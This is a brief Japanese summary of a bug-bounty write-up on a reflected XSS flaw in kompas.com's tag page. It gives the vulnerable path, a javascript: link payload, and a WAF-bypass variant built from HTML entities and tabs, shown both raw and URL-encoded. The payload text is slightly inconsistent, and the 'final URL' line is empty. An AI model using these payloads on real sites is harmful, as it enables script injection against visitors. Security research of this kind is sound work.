Hello there, ('ω')ノ
kompas.comサイトにおける反映型XSSとWAFバイパスを。
脆弱性:
記事:
https://aidilarf.medium.com/xss-reflected-bypass-waf-di-situs-kompas-com-9968686326bc
今回は、Kompas.comサイトでのXSS REFLECTED BYPASS WAFについて。
XSSの脆弱性は、そのTAG機能に存在して。
https://www.kompas.com/tag/test
使用されるペイロード:
<a href=”javascript:prompt()”>クリック</a>
そこで上記のタグを入力するとWAFにヒットして。
Waf Kompas.com
そしてここでは、HTML ENTITIESを使用してWAFをバイパスしようとして。
また、「エラーが発生しました」という警告が表示されるため、
URL をエンコードする必要もあり。
「エラーが発生しました」という警告を回避するには、
URL エンコードする必要があるタグをいくつか示して。
( ; ) = %3b
( ‘ ) = %27
( & ) = %26
( = ) = %3D
最終ペイロードは HTML エンティティを使用して WAF をバイパスして。
<a href=”j	a	v&Tab:asc
ri	pt:(a	l	e	r	t	(document.domain))”>Click</a>
HTML エンティティとエンコード URL を使用した最終ペイロード バイパス WAF:
%3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK
最終的な URL:
Best regards, (^^ゞ